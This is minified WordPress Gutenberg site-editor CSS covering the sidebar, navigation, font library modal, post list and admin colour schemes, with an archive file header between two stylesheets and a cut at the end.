.edit-site-sidebar__content{ contain:content; flex-grow:1; overflow-x:hidden; overflow-y:auto; } @keyframes local--slide-from-right{ 0%{ opacity:0; transform:translateX(-50px); } to{ opacity:1; transform:none; } } @keyframes local--slide-from-left{ 0%{ opacity:0; transform:translateX(50px); } to{ opacity:1; transform:none; } } .edit-site-sidebar__screen-wrapper{ overflow-x:auto; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar{ height:12px; width:12px; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{ background-color:initial; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{ background-color:#757575; } .edit-site-sidebar__screen-wrapper{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{ scrollbar-color:#757575 #0000; } .edit-site-sidebar__screen-wrapper{ will-change:transform; } @media (hover:none){ .edit-site-sidebar__screen-wrapper{ scrollbar-color:#757575 #0000; } } .edit-site-sidebar__screen-wrapper{ animation-duration:.14s; animation-timing-function:ease-in-out; display:flex; flex-direction:column; height:100%; max-height:100%; padding:0 12px; scrollbar-gutter:stable; will-change:transform, opacity; } @media (prefers-reduced-motion:reduce){ .edit-site-sidebar__screen-wrapper{ animation-duration:0s; } } .edit-site-sidebar__screen-wrapper.slide-from-left{ animation-name:local--slide-from-left; } .edit-site-sidebar__screen-wrapper.slide-from-right{ animation-name:local--slide-from-right; } .edit-site-sidebar-button{ color:#e0e0e0; flex-shrink:0; } .edit-site-sidebar-button:focus:not(:disabled){ box-shadow:none; outline:none; } .edit-site-sidebar-button:focus-visible:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:3px solid #0000; } .edit-site-sidebar-button:focus,.edit-site-sidebar-button:focus-visible,.edit-site-sidebar-button:hover:not(:disabled,[aria-disabled=true]),.edit-site-sidebar-button:not(:disabled,[aria-disabled=true]):active,.edit-site-sidebar-button[aria-expanded=true]{ color:#f0f0f0; } .edit-site-sidebar-navigation-item.components-item{ border:none; color:#949494; min-height:40px; padding:8px 16px 8px 6px; } .edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-item.components-item[aria-current=true]{ color:#e0e0e0; } .edit-site-sidebar-navigation-item.components-item:focus .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item:hover .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item[aria-current=true] .edit-site-sidebar-navigation-item__drilldown-indicator{ fill:#e0e0e0; } .edit-site-sidebar-navigation-item.components-item[aria-current=true]{ background:#2f2f2f; color:#fff; font-weight:500; } .edit-site-sidebar-navigation-item.components-item:focus-visible{ transform:translateZ(0); } .edit-site-sidebar-navigation-item.components-item .edit-site-sidebar-navigation-item__drilldown-indicator{ fill:#949494; } .edit-site-sidebar-navigation-item.components-item.with-suffix{ padding-left:16px; } .edit-site-sidebar-navigation-screen__content .block-editor-list-view-block-select-button{ cursor:grab; padding:8px 0 8px 8px; } .edit-site-sidebar-navigation-screen{ display:flex; flex-direction:column; overflow-x:unset !important; position:relative; } .edit-site-sidebar-navigation-screen__main{ flex-grow:1; margin-bottom:16px; } .edit-site-sidebar-navigation-screen__main.has-footer{ margin-bottom:0; } .edit-site-sidebar-navigation-screen__content{ padding:0 16px; } .edit-site-sidebar-navigation-screen__content .components-text{ color:#ccc; } .edit-site-sidebar-navigation-screen__content .components-heading{ margin-bottom:8px; } .edit-site-sidebar-navigation-screen__title-icon{ background:#1e1e1e; margin-bottom:8px; padding-bottom:8px; padding-top:48px; position:sticky; top:0; z-index:1; } .edit-site-sidebar-navigation-screen__title{ flex-grow:1; overflow-wrap:break-word; } .edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title,.edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title .edit-site-sidebar-navigation-screen__title{ line-height:32px; } .edit-site-sidebar-navigation-screen__actions{ display:flex; flex-shrink:0; } @media (min-width:782px){ .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variation-container{ max-width:292px; } } .edit-site-global-styles-variation-title{ color:#ddd; font-size:11px; font-weight:500; text-transform:uppercase; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{ outline-color:#ffffff0d; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{ outline-color:#ffffff26; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview{ outline-color:#fff; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{ outline-color:var(--wp-admin-theme-color); } .edit-site-sidebar-navigation-screen__footer{ background-color:#1e1e1e; border-top:1px solid #2f2f2f; bottom:0; gap:0; margin:16px 0 0; padding:8px 16px; position:sticky; } .edit-site-sidebar-navigation-screen__footer .edit-site-sidebar-navigation-screen-details-footer{ margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-navigation-screen__input-control{ width:100%; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__container{ background:#2f2f2f; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__container .components-button{ color:#e0e0e0 !important; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__input{ background:#2f2f2f !important; color:#e0e0e0 !important; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__backdrop{ border:4px !important; } .edit-site-sidebar-navigation-screen__input-control .components-base-control__help{ color:#949494; } .edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item[aria-current]{ background:none; } .sidebar-navigation__more-menu .components-button{ color:#e0e0e0; } .sidebar-navigation__more-menu .components-button:focus,.sidebar-navigation__more-menu .components-button:hover,.sidebar-navigation__more-menu .components-button[aria-current]{ color:#f0f0f0; } .edit-site-sidebar-navigation-screen-patterns__group{ margin-bottom:24px; margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-navigation-screen-patterns__group:last-of-type{ border-bottom:0; margin-bottom:0; padding-bottom:0; } .edit-site-sidebar-navigation-screen-patterns__group-header{ margin-top:16px; } .edit-site-sidebar-navigation-screen-patterns__group-header p{ color:#949494; } .edit-site-sidebar-navigation-screen-patterns__group-header h2{ font-size:11px; font-weight:500; text-transform:uppercase; } .edit-site-sidebar-navigation-screen-patterns__divider{ border-top:1px solid #2f2f2f; margin:16px 0; } .edit-site-sidebar-navigation-screen__description{ margin:0 0 32px; } .edit-site-sidebar-navigation-screen-navigation-menus{ margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{ white-space:normal; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__title{ margin-top:3px; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu-cell{ padding-left:0; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button{ color:#949494; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:hover,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button[aria-current]{ color:#fff; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu{ color:#949494; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:hover{ color:#fff; } .edit-site-sidebar-navigation-screen-navigation-menus__loading.components-spinner{ display:block; margin-left:auto; margin-right:auto; } .edit-site-sidebar-navigation-screen-navigation-menus__helper-block-editor{ display:none; } .edit-site-sidebar-dataviews,.edit-site-sidebar-navigation-screen-main,.edit-site-sidebar-navigation-screen-templates-browse{ margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-dataviews-dataview-item{ border-radius:2px; } .edit-site-sidebar-dataviews-dataview-item:focus,.edit-site-sidebar-dataviews-dataview-item:hover,.edit-site-sidebar-dataviews-dataview-item[aria-current]{ color:#e0e0e0; } .edit-site-sidebar-dataviews-dataview-item.is-selected{ background:#2f2f2f; color:#fff; font-weight:500; } .edit-site-site-hub{ align-items:center; display:flex; gap:8px; height:64px; justify-content:space-between; margin-left:12px; } .edit-site-site-hub__actions{ flex-shrink:0; } .edit-site-site-hub__view-mode-toggle-container{ flex-shrink:0; height:64px; width:64px; } .edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{ background:#0000; } .edit-site-site-hub__title .components-button{ color:#e0e0e0; display:block; flex-grow:1; font-size:15px; font-weight:500; margin-right:-4px; overflow:hidden; padding-left:16px; position:relative; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; } .edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{ color:#e0e0e0; } .edit-site-site-hub__title .components-button:focus{ box-shadow:none; outline:none; } .edit-site-site-hub__title .components-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .edit-site-site-hub__title .components-button:after{ content:"↗"; font-weight:400; left:0; opacity:0; position:absolute; } @media not (prefers-reduced-motion){ .edit-site-site-hub__title .components-button:after{ transition:opacity .1s linear; } } .edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{ opacity:1; } .edit-site-site-hub_toggle-command-center{ color:#e0e0e0; } .edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{ fill:#f0f0f0; } .edit-site-site-icon__icon{ fill:currentColor; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__icon{ padding:12px; } .edit-site-site-icon__image{ aspect-ratio:1/1; background:#333; height:100%; object-fit:cover; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__image{ border-radius:0; } .edit-site-editor__view-mode-toggle button:focus{ position:relative; } .edit-site-editor__view-mode-toggle button:focus:before{ bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff; content:""; display:block; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-site-style-book{ height:100%; } .edit-site-style-book.is-button{ border-radius:8px; } .edit-site-style-book{ align-items:stretch; display:flex; flex-direction:column; } .edit-site-style-book__iframe{ display:block; height:100%; width:100%; } .edit-site-style-book__iframe.is-button{ border-radius:8px; } .edit-site-style-book__iframe.is-focused{ outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-2); } .edit-site-style-book__tablist-container{ background:#fff; display:flex; flex:none; padding-left:56px; width:100%; } .edit-site-style-book__tabpanel{ flex:1 0 auto; overflow:auto; } .edit-site-editor-canvas-container{ background-color:var(--wp-editor-canvas-background); height:100%; } .edit-site-editor-canvas-container iframe{ display:block; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{ padding:24px 24px 0; } .edit-site-editor-canvas-container__section{ background:#fff; border-radius:8px; bottom:0; left:0; overflow:hidden; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .edit-site-editor-canvas-container__section{ transition:all .3s; } } .edit-site-editor-canvas-container__close-button{ background:#fff; left:8px; position:absolute; top:8px; z-index:2; } .edit-site-post-edit{ padding:24px; } .dataforms-layouts-panel__field-dropdown .fields-controls__password{ border-top:1px solid #e0e0e0; padding-top:16px; } .edit-site-post-list__featured-image{ height:100%; object-fit:cover; width:100%; } .edit-site-post-list__featured-image-wrapper{ border-radius:4px; height:100%; width:100%; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){ background-color:#f0f0f0; border-radius:4px; display:block; flex-grow:0 !important; height:32px; overflow:hidden; position:relative; width:32px; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; position:absolute; right:0; top:0; width:100%; } .edit-site-post-list__featured-image-button{ background-color:unset; border:none; border-radius:4px; box-shadow:none; box-sizing:border-box; cursor:pointer; height:100%; overflow:hidden; padding:0; width:100%; } .edit-site-post-list__featured-image-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{ background:rgba(var(--wp-admin-theme-color--rgb), .04); box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .edit-site-post-list__status-icon{ height:24px; width:24px; } .edit-site-post-list__status-icon svg{ fill:currentColor; margin-right:-4px; } .edit-site-resizable-frame__inner{ position:relative; } body:has(.edit-site-resizable-frame__inner.is-resizing){ cursor:col-resize; user-select:none; -webkit-user-select:none; } .edit-site-resizable-frame__inner.is-resizing:before{ content:""; inset:0; position:absolute; z-index:1; } .edit-site-resizable-frame__inner-content{ inset:0; position:absolute; z-index:0; } .edit-site-resizable-frame__handle{ align-items:center; background-color:#75757566; border:0; border-radius:4px; cursor:col-resize; display:flex; height:64px; justify-content:flex-end; padding:0; position:absolute; top:calc(50% - 32px); width:4px; z-index:100; } .edit-site-resizable-frame__handle:before{ content:""; height:100%; position:absolute; right:100%; width:32px; } .edit-site-resizable-frame__handle:after{ content:""; height:100%; left:100%; position:absolute; width:32px; } .edit-site-resizable-frame__handle:focus-visible{ outline:2px solid #0000; } .edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{ background-color:var(--wp-admin-theme-color); } .edit-site-push-changes-to-global-styles-control .components-button{ justify-content:center; width:100%; } @media (min-width:782px){ .font-library-modal.font-library-modal{ width:65vw; } } .font-library-modal .components-modal__header{ border-bottom:none; } .font-library-modal .components-modal__content{ margin-bottom:70px; padding-top:0; } .font-library-modal .font-library-modal__subtitle{ font-size:11px; font-weight:500; text-transform:uppercase; } .font-library-modal .components-navigator-screen{ padding:3px; } .font-library-modal__tabpanel-layout{ margin-top:32px; } .font-library-modal__tabpanel-layout .font-library-modal__loading{ align-items:center; display:flex; height:100%; justify-content:center; padding-top:124px; position:absolute; right:0; top:0; width:100%; } .font-library-modal__footer{ background-color:#fff; border-top:1px solid #ddd; bottom:32px; height:70px; margin:0 -32px -32px; padding:16px 32px; position:absolute; width:100%; } .font-library-modal__page-selection{ font-size:11px; font-weight:500; text-transform:uppercase; } @media (min-width:600px){ .font-library-modal__page-selection .components-select-control__input{ font-size:11px !important; font-weight:500; } } .font-library-modal__fonts-title{ font-size:11px; font-weight:600; text-transform:uppercase; } .font-library-modal__fonts-list,.font-library-modal__fonts-title{ margin-bottom:0; margin-top:0; } .font-library-modal__fonts-list-item{ margin-bottom:0; } .font-library-modal__font-card{ border:1px solid #e0e0e0; height:auto !important; margin-top:-1px; padding:16px; width:100%; } .font-library-modal__font-card:hover{ background-color:#f0f0f0; } .font-library-modal__font-card:focus{ position:relative; } .font-library-modal__font-card .font-library-modal__font-card__name{ font-weight:700; } .font-library-modal__font-card .font-library-modal__font-card__count{ color:#757575; } .font-library-modal__font-card .font-library-modal__font-variant_demo-image{ display:block; height:24px; width:auto; } .font-library-modal__font-card .font-library-modal__font-variant_demo-text{ flex-shrink:0; white-space:nowrap; } @media not (prefers-reduced-motion){ .font-library-modal__font-card .font-library-modal__font-variant_demo-text{ transition:opacity .3s ease-in-out; } } .font-library-modal__font-variant{ border-bottom:1px solid #e0e0e0; padding-bottom:16px; } .font-library-modal__tablist-container{ background:#fff; border-bottom:1px solid #ddd; margin:0 -32px; padding:0 16px; position:sticky; top:0; z-index:1; } .font-library-modal__tablist-container [role=tablist]{ margin-bottom:-1px; } .font-library-modal__upload-area{ align-items:center; display:flex; height:256px !important; justify-content:center; width:100%; } button.font-library-modal__upload-area{ background-color:#f0f0f0; } .font-library-modal__local-fonts{ margin:0 auto; width:80%; } .font-library-modal__local-fonts .font-library-modal__upload-area__text{ color:#757575; } .font-library__google-fonts-confirm{ align-items:center; display:flex; justify-content:center; margin-top:64px; } .font-library__google-fonts-confirm p{ line-height:1.4; } .font-library__google-fonts-confirm h2{ font-size:1.2rem; font-weight:400; } .font-library__google-fonts-confirm .components-card{ padding:16px; width:400px; } .font-library__google-fonts-confirm .components-button{ justify-content:center; width:100%; } .font-library-modal__select-all{ padding:16px 17px 16px 16px; } .font-library-modal__select-all .components-checkbox-control__label{ padding-right:16px; } .edit-site-pagination .components-button.is-tertiary{ height:32px; justify-content:center; width:32px; } .edit-site-global-styles-variations_item{ box-sizing:border-box; cursor:pointer; } .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{ border-radius:2px; outline:1px solid #0000001a; outline-offset:-1px; overflow:hidden; position:relative; } @media not (prefers-reduced-motion){ .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{ transition:outline .1s linear; } } .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill{ height:32px; } .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill .block-editor-iframe__scale-container{ overflow:hidden; } .edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{ outline-color:#0000004d; } .edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview,.edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{ outline-color:#1e1e1e; outline-offset:1px; outline-width:var(--wp-admin-border-width-focus); } .edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{ outline-color:var(--wp-admin-theme-color); } .edit-site-styles .edit-site-global-styles-screen-root{ box-shadow:none; } .edit-site-styles .edit-site-global-styles-screen-root>div>hr{ display:none; } .edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .components-tools-panel{ border-top:none; } .edit-site-styles .edit-site-global-styles-sidebar__navigator-provider{ overflow-y:auto; padding-left:0; padding-right:0; } .edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .edit-site-global-styles-sidebar__navigator-screen{ outline:none; padding:12px; } .edit-site-styles .edit-site-sidebar-button{ color:#1e1e1e; } ::view-transition-image-pair(root){ isolation:auto; } ::view-transition-new(root),::view-transition-old(root){ animation:none; display:block; mix-blend-mode:normal; } body.js #wpadminbar{ display:none; } body.js #wpbody{ padding-top:0; } body.js.appearance_page_gutenberg-template-parts,body.js.site-editor-php{ background:#fff; } body.js.appearance_page_gutenberg-template-parts #wpcontent,body.js.site-editor-php #wpcontent{ padding-right:0; } body.js.appearance_page_gutenberg-template-parts #wpbody-content,body.js.site-editor-php #wpbody-content{ padding-bottom:0; } body.js.appearance_page_gutenberg-template-parts #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.appearance_page_gutenberg-template-parts #wpfooter,body.js.site-editor-php #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.site-editor-php #wpfooter{ display:none; } body.js.appearance_page_gutenberg-template-parts .a11y-speak-region,body.js.site-editor-php .a11y-speak-region{ right:-1px; top:-1px; } body.js.appearance_page_gutenberg-template-parts ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-template-parts ul#adminmenu>li.current>a.current:after,body.js.site-editor-php ul#adminmenu a.wp-has-current-submenu:after,body.js.site-editor-php ul#adminmenu>li.current>a.current:after{ border-left-color:#fff; } body.js.appearance_page_gutenberg-template-parts .media-frame select.attachment-filters:last-of-type,body.js.site-editor-php .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } body.js.site-editor-php{ background:#1e1e1e; } .edit-site{ box-sizing:border-box; } .edit-site *,.edit-site :after,.edit-site :before{ box-sizing:inherit; } .edit-site{ height:100vh; } @media (min-width:600px){ .edit-site{ bottom:0; left:0; min-height:100vh; position:fixed; right:0; top:0; } } .no-js .edit-site{ min-height:0; position:static; } .edit-site .interface-interface-skeleton{ top:0; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!hoLdist/edit-site/style.cssnuȯ@charset "UTF-8"; .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .dataviews-picker-wrapper,.dataviews-wrapper{ box-sizing:border-box; container:dataviews-wrapper/inline-size; display:flex; flex-direction:column; font-size:13px; height:100%; line-height:1.4; overflow:auto; scroll-padding-bottom:64px; } .dataviews-filters__container,.dataviews__view-actions{ box-sizing:border-box; flex-shrink:0; left:0; padding:16px 48px; position:sticky; } @media not (prefers-reduced-motion){ .dataviews-filters__container,.dataviews__view-actions{ transition:padding .1s ease-out; } } .dataviews-loading,.dataviews-no-results{ align-items:center; display:flex; flex-grow:1; justify-content:center; padding:0 48px; } @media not (prefers-reduced-motion){ .dataviews-loading,.dataviews-no-results{ transition:padding .1s ease-out; } } .dataviews-loading-more{ text-align:center; } @container (max-width: 430px){ .dataviews-filters__container,.dataviews__view-actions{ padding:12px 24px; } .dataviews-loading,.dataviews-no-results{ padding-left:24px; padding-right:24px; } } .dataviews-title-field{ font-size:13px; font-weight:500; width:100%; } .dataviews-title-field,.dataviews-title-field a{ color:#2f2f2f; text-overflow:ellipsis; white-space:nowrap; } .dataviews-title-field a{ display:block; flex-grow:0; overflow:hidden; text-decoration:none; } .dataviews-title-field a:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field a:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .dataviews-title-field button.components-button.is-link{ color:#1e1e1e; display:block; font-weight:inherit; overflow:hidden; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; width:100%; } .dataviews-title-field button.components-button.is-link:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable{ color:#2f2f2f; cursor:pointer; } .dataviews-title-field--clickable:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){ overflow:hidden; padding:8px 0 0; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{ padding-inline:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{ padding-inline-start:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table 